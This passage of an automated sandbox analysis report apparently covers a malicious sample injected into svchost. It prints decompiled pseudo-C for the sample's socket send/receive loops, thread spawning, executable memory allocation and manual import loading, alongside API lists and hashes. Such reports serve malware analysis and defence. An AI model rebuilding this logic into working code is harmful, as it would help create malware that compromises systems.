                                                                                                                                                                                                                                                                            0x040014cf
                                                                                                                                                                                                                                                                            0x0400161f
                                                                                                                                                                                                                                                                            0x04001622
                                                                                                                                                                                                                                                                            0x0400162d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400162d
                                                                                                                                                                                                                                                                            0x040014ea

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 04001430: QueryPerformanceCounter.KERNEL32(00000000), ref: 04001444
                                                                                                                                                                                                                                                                              • Part of subcall function 04001160: socket.WS2_32(00000002,00000001,00000006), ref: 0400116C
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000001), ref: 0400160F
                                                                                                                                                                                                                                                                              • Part of subcall function 040013B0: QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                              • Part of subcall function 040013B0: Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep$CountTickclosesocketlstrcatsocket
                                                                                                                                                                                                                                                                            • String ID: F
                                                                                                                                                                                                                                                                            • API String ID: 900668384-1304234792
                                                                                                                                                                                                                                                                            • Opcode ID: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                                            • Instruction ID: 6ed18f16ab0dd41aabad2fa4162e749fae483d95e79aad030a55c0feddf4590a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf3c1adff95c02d838a93fa7c3e08858ca76797544e8a022648dccf564d39913
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 383164B5D4021CABEB24EF94DC88BD97374AB18308F0482D8E51D7A181EB75AF84CF51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E04001989() {
                                                                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                                                            				void* _t64;
                                                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t48 = E04001490(); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t86 - 0x19c)) = _t48;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t86 - 0x19c)) <= 0 ||  *((intOrPtr*)(_t86 - 0x19c)) >= 0x2710) {
                                                                                                                                                                                                                                                                            						Sleep(0x7530);
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            						_t50 = E040023E0( *(0x4088c1c +  *(_t86 - 0x194) * 4)); // executed
                                                                                                                                                                                                                                                                            						_t88 = _t87 + 4;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t86 - 0x1a0)) = _t50;
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t86 - 0x1a0)) != 0) {
                                                                                                                                                                                                                                                                            							E04001DC0( *((intOrPtr*)(_t86 - 0x1a0)), 0x4085600); // executed
                                                                                                                                                                                                                                                                            							_t64 = E04001470(0xc);
                                                                                                                                                                                                                                                                            							_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                                            							 *(_t86 - 0x1b4) = _t64;
                                                                                                                                                                                                                                                                            							 *(_t86 - 0x1a4) =  *(_t86 - 0x1b4);
                                                                                                                                                                                                                                                                            							 *( *(_t86 - 0x1a4)) =  *(0x4088c1c +  *(_t86 - 0x194) * 4);
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *(_t86 - 0x1a4) + 4)) =  *((intOrPtr*)(_t86 - 0x1a0));
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)( *(_t86 - 0x1a4) + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                            							CreateThread(0, 0, E04001630,  *(_t86 - 0x1a4), 0, 0); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *(_t86 - 0x1a8) = 0;
                                                                                                                                                                                                                                                                            						while( *(_t86 - 0x1a8) < 3) {
                                                                                                                                                                                                                                                                            							_t53 = E040023E0( *(0x4088c20 + ( *((intOrPtr*)(_t86 - 0x198)) +  *(_t86 - 0x1a8)) * 4)); // executed
                                                                                                                                                                                                                                                                            							_t88 = _t88 + 4;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t86 - 0x1ac)) = _t53;
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t86 - 0x1ac)) != 0) {
                                                                                                                                                                                                                                                                            								E04001DC0( *((intOrPtr*)(_t86 - 0x1ac)), 0x4085600); // executed
                                                                                                                                                                                                                                                                            								_t58 = E04001470(0xc);
                                                                                                                                                                                                                                                                            								_t88 = _t88 + 0xc;
                                                                                                                                                                                                                                                                            								 *(_t86 - 0x1b8) = _t58;
                                                                                                                                                                                                                                                                            								 *(_t86 - 0x1b0) =  *(_t86 - 0x1b8);
                                                                                                                                                                                                                                                                            								 *( *(_t86 - 0x1b0)) =  *(0x4088c20 + ( *((intOrPtr*)(_t86 - 0x198)) +  *(_t86 - 0x1a8)) * 4);
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *(_t86 - 0x1b0) + 4)) =  *((intOrPtr*)(_t86 - 0x1ac));
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)( *(_t86 - 0x1b0) + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                            								CreateThread(0, 0, E04001630,  *(_t86 - 0x1b0), 0, 0); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							 *(_t86 - 0x1a8) =  *(_t86 - 0x1a8) + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                            						Sleep(0x9c40);
                                                                                                                                                                                                                                                                            						L04001006();
                                                                                                                                                                                                                                                                            						ExitProcess(0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                                                            0x04001996
                                                                                                                                                                                                                                                                            0x040017b6
                                                                                                                                                                                                                                                                            0x040017bb
                                                                                                                                                                                                                                                                            0x040017c8
                                                                                                                                                                                                                                                                            0x04001990
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040017de
                                                                                                                                                                                                                                                                            0x040017ec
                                                                                                                                                                                                                                                                            0x040017ff
                                                                                                                                                                                                                                                                            0x04001804
                                                                                                                                                                                                                                                                            0x04001807
                                                                                                                                                                                                                                                                            0x04001814
                                                                                                                                                                                                                                                                            0x04001822
                                                                                                                                                                                                                                                                            0x0400182c
                                                                                                                                                                                                                                                                            0x04001831
                                                                                                                                                                                                                                                                            0x04001834
                                                                                                                                                                                                                                                                            0x04001840
                                                                                                                                                                                                                                                                            0x04001859
                                                                                                                                                                                                                                                                            0x04001867
                                                                                                                                                                                                                                                                            0x04001870
                                                                                                                                                                                                                                                                            0x0400188b
                                                                                                                                                                                                                                                                            0x0400188b
                                                                                                                                                                                                                                                                            0x04001891
                                                                                                                                                                                                                                                                            0x040018ac
                                                                                                                                                                                                                                                                            0x040018cd
                                                                                                                                                                                                                                                                            0x040018d2
                                                                                                                                                                                                                                                                            0x040018d5
                                                                                                                                                                                                                                                                            0x040018e2
                                                                                                                                                                                                                                                                            0x040018f4
                                                                                                                                                                                                                                                                            0x040018fe
                                                                                                                                                                                                                                                                            0x04001903
                                                                                                                                                                                                                                                                            0x04001906
                                                                                                                                                                                                                                                                            0x04001912
                                                                                                                                                                                                                                                                            0x04001931
                                                                                                                                                                                                                                                                            0x0400193f
                                                                                                                                                                                                                                                                            0x04001948
                                                                                                                                                                                                                                                                            0x04001963
                                                                                                                                                                                                                                                                            0x04001963
                                                                                                                                                                                                                                                                            0x040018a6
                                                                                                                                                                                                                                                                            0x040018a6
                                                                                                                                                                                                                                                                            0x04001976
                                                                                                                                                                                                                                                                            0x04001981
                                                                                                                                                                                                                                                                            0x0400199b
                                                                                                                                                                                                                                                                            0x040019a2
                                                                                                                                                                                                                                                                            0x040019a2
                                                                                                                                                                                                                                                                            0x040017c8

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 04001490: lstrcat.KERNEL32(?,04003134), ref: 04001581
                                                                                                                                                                                                                                                                              • Part of subcall function 04001490: GetTickCount.KERNEL32 ref: 04001587
                                                                                                                                                                                                                                                                              • Part of subcall function 04001490: closesocket.WS2_32(000000FF), ref: 04001606
                                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040017E6
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 0400188B
                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00001630,?,00000000,00000000), ref: 04001963
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04001976
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 04001981
                                                                                                                                                                                                                                                                              • Part of subcall function 04001DC0: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 04001E14
                                                                                                                                                                                                                                                                              • Part of subcall function 04001470: GetProcessHeap.KERNEL32(00000008,?), ref: 04001479
                                                                                                                                                                                                                                                                              • Part of subcall function 04001470: RtlAllocateHeap.NTDLL(00000000), ref: 04001480
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00007530), ref: 04001990
                                                                                                                                                                                                                                                                            • WSACleanup.WS2_32 ref: 0400199B
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 040019A2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Create$HeapProcessSleepThread$AllocAllocateCleanupCountEventExitObjectSingleTickVirtualWaitclosesocketlstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3000315311-0
                                                                                                                                                                                                                                                                            • Opcode ID: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                                            • Instruction ID: ecbd1e530684247b239ee6e1b256228db756e23c6e027602103708aff6be2e82
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed75c3485ee5f6438b7b72692c8e44a361812d41e5d2ef45d7a2c52b189860e4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84410674A012289FFB60DF14DC95BDAB7B0AB4A708F1480E8E5497B2C4D7756E80CF46
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 294 4001040-400104a 295 4001052-4001054 294->295 296 400104c-4001050 294->296 298 40010d3-40010d6 295->298 296->295 297 4001056 296->297 299 400105d-4001061 297->299 300 4001063-4001065 299->300 301 4001067-4001084 recv 299->301 300->298 302 4001086-400108c 301->302 303 400109f-40010a3 301->303 302->303 304 400108e-4001092 302->304 305 40010a5 303->305 306 40010a7-40010ab 303->306 304->303 307 4001094-400109d GetTickCount 304->307 308 40010c3-40010c7 305->308 309 40010ad 306->309 310 40010af-40010c1 306->310 307->303 311 40010d1 308->311 312 40010c9-40010cf 308->312 309->308 310->299 311->298 312->311
                                                                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                                                                            			E04001040(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					while(_a12 != 0) {
                                                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                                                            						_t26 = _a12;
                                                                                                                                                                                                                                                                            						_push(_t26);
                                                                                                                                                                                                                                                                            						_push(_a8 + _v8);
                                                                                                                                                                                                                                                                            						_push(_a4); // executed
                                                                                                                                                                                                                                                                            						L04001024(); // executed
                                                                                                                                                                                                                                                                            						_v12 = _t26;
                                                                                                                                                                                                                                                                            						if(_a20 != 0 &&  *_a20 == 0 && _v12 > 0) {
                                                                                                                                                                                                                                                                            							 *_a20 = GetTickCount();
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v12 >= 0) {
                                                                                                                                                                                                                                                                            							if(_v12 != 0) {
                                                                                                                                                                                                                                                                            								_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                                            								_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                                                                            							if(_a16 != 0) {
                                                                                                                                                                                                                                                                            								 *_a16 = _v8;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x0400104a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001056
                                                                                                                                                                                                                                                                            0x04001056
                                                                                                                                                                                                                                                                            0x0400105d
                                                                                                                                                                                                                                                                            0x04001067
                                                                                                                                                                                                                                                                            0x04001069
                                                                                                                                                                                                                                                                            0x0400106c
                                                                                                                                                                                                                                                                            0x04001073
                                                                                                                                                                                                                                                                            0x04001077
                                                                                                                                                                                                                                                                            0x04001078
                                                                                                                                                                                                                                                                            0x0400107d
                                                                                                                                                                                                                                                                            0x04001084
                                                                                                                                                                                                                                                                            0x0400109d
                                                                                                                                                                                                                                                                            0x0400109d
                                                                                                                                                                                                                                                                            0x040010a3
                                                                                                                                                                                                                                                                            0x040010ab
                                                                                                                                                                                                                                                                            0x040010b5
                                                                                                                                                                                                                                                                            0x040010be
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040010be
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040010a5
                                                                                                                                                                                                                                                                            0x040010c3
                                                                                                                                                                                                                                                                            0x040010c7
                                                                                                                                                                                                                                                                            0x040010cf
                                                                                                                                                                                                                                                                            0x040010cf
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040010d1
                                                                                                                                                                                                                                                                            0x040010a3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001063

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • recv.WS2_32(?,00000000,?,00000000), ref: 04001078
                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 04001094
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CountTickrecv
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1874678310-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                                            • Instruction ID: 449e92a0b18f183db0f7345c8df75c2f30566562dbb85a03ceabff6c1882a85f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B821F274900299EFEF10CFA4D4447AE7BF1AF04309F108559E8456B281D7B6AA94DB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 313 40010e0-40010ea 314 40010f2-40010f4 313->314 315 40010ec-40010f0 313->315 317 400114d-4001150 314->317 315->314 316 40010f6 315->316 318 40010fd-4001101 316->318 319 4001103-4001120 send 318->319 320 400113a-400114b send 318->320 321 4001122-4001124 319->321 322 4001126-4001138 319->322 320->317 321->317 322->318
                                                                                                                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                                                                                                                            			E040010E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				if(_a8 == 0 || _a12 < 0) {
                                                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                                                            					while(_a12 != 0) {
                                                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                                                            						_t22 = _a12;
                                                                                                                                                                                                                                                                            						_push(_t22);
                                                                                                                                                                                                                                                                            						_push(_a8 + _v8);
                                                                                                                                                                                                                                                                            						_push(_a4); // executed
                                                                                                                                                                                                                                                                            						L04001012(); // executed
                                                                                                                                                                                                                                                                            						_v12 = _t22;
                                                                                                                                                                                                                                                                            						if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                            							_v8 = _v8 + _v12;
                                                                                                                                                                                                                                                                            							_a12 = _a12 - _v12;
                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					_push(_a8);
                                                                                                                                                                                                                                                                            					_push(_a4); // executed
                                                                                                                                                                                                                                                                            					L04001012(); // executed
                                                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x040010ea
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040010f6
                                                                                                                                                                                                                                                                            0x040010f6
                                                                                                                                                                                                                                                                            0x040010fd
                                                                                                                                                                                                                                                                            0x04001103
                                                                                                                                                                                                                                                                            0x04001105
                                                                                                                                                                                                                                                                            0x04001108
                                                                                                                                                                                                                                                                            0x0400110f
                                                                                                                                                                                                                                                                            0x04001113
                                                                                                                                                                                                                                                                            0x04001114
                                                                                                                                                                                                                                                                            0x04001119
                                                                                                                                                                                                                                                                            0x04001120
                                                                                                                                                                                                                                                                            0x0400112c
                                                                                                                                                                                                                                                                            0x04001135
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001135
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04001122
                                                                                                                                                                                                                                                                            0x0400113a
                                                                                                                                                                                                                                                                            0x0400113c
                                                                                                                                                                                                                                                                            0x04001141
                                                                                                                                                                                                                                                                            0x04001145
                                                                                                                                                                                                                                                                            0x04001146
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0400114b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • send.WS2_32(?,00000000,?,00000000), ref: 04001114
                                                                                                                                                                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 04001146
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: send
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                            • Opcode ID: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                                            • Instruction ID: 7140d396e4fa338b1c45032ebff5f33e510887e1da457bfc48643044175dbf3e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80012234A00348FBEF14CFA8D845BEE77B4AB44318F10C658E9656B2C0D7B6A651EB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 323 40013b0-40013c1 324 4001421-4001427 323->324 325 40013c3-40013c7 323->325 325->324 326 40013c9-40013d0 325->326 327 40013db-40013e1 326->327 328 4001411-400141a 327->328 329 40013e3-400140f QueryPerformanceCounter Sleep 327->329 328->324 330 40013d2-40013d8 329->330 330->327
                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E040013B0(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v20;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					while(_v12 < _a8) {
                                                                                                                                                                                                                                                                            						QueryPerformanceCounter( &_v20);
                                                                                                                                                                                                                                                                            						Sleep(0); // executed
                                                                                                                                                                                                                                                                            						_t17 = _v20.LowPart % 0x3d + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstuvwxyz1234567890"; // 0x44434241
                                                                                                                                                                                                                                                                            						 *((char*)(_a4 + _v12)) =  *_t17;
                                                                                                                                                                                                                                                                            						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((char*)(_a4 + _a8)) = 0;
                                                                                                                                                                                                                                                                            					_v8 = 1;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                                                            0x040013b6
                                                                                                                                                                                                                                                                            0x040013c1
                                                                                                                                                                                                                                                                            0x040013c9
                                                                                                                                                                                                                                                                            0x040013db
                                                                                                                                                                                                                                                                            0x040013e7
                                                                                                                                                                                                                                                                            0x040013ef
                                                                                                                                                                                                                                                                            0x04001407
                                                                                                                                                                                                                                                                            0x0400140d
                                                                                                                                                                                                                                                                            0x040013d8
                                                                                                                                                                                                                                                                            0x040013d8
                                                                                                                                                                                                                                                                            0x04001417
                                                                                                                                                                                                                                                                            0x0400141a
                                                                                                                                                                                                                                                                            0x0400141a
                                                                                                                                                                                                                                                                            0x04001427

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                            • Opcode ID: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                                            • Instruction ID: 9d74403c1c2c7bb1751bbbba9dc0b5917814bf527727232baae25755bbc2d242
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18011A30904208EBEB01CF98D494BEDBBB1FF44308F14C098E9496B381D379AA84CB81
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 331 4011cd-4011e4 332 401253-401255 331->332 333 4011e6-4011e9 331->333 334 4011ea-4011ef 333->334 335 4011f1-401204 LoadLibraryExA 334->335 336 40124a-40124f 334->336 335->332 337 401206-40120d 335->337 336->332 338 401212-401218 337->338 339 40120f 337->339 340 40121b-40121f 338->340 339->338 341 401221-401224 340->341 342 401226-40122b 340->342 341->334 343 401235 342->343 344 40122d-401233 342->344 345 40123a-401248 343->345 344->345 345->340
                                                                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                                                                            			E004011CD(intOrPtr _a4, intOrPtr _a8, signed int _a16) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                                                            				intOrPtr* _t34;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				asm("pushad");
                                                                                                                                                                                                                                                                            				_t33 =  *((intOrPtr*)(_a4 +  *((intOrPtr*)(_a4 + 0x3c)) + 0x80));
                                                                                                                                                                                                                                                                            				if(_t33 != 0) {
                                                                                                                                                                                                                                                                            					_t34 = _t33 + _a4;
                                                                                                                                                                                                                                                                            					asm("cld");
                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                            						_t23 =  *((intOrPtr*)(_t34 + 0xc));
                                                                                                                                                                                                                                                                            						if(_t23 == 0) {
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
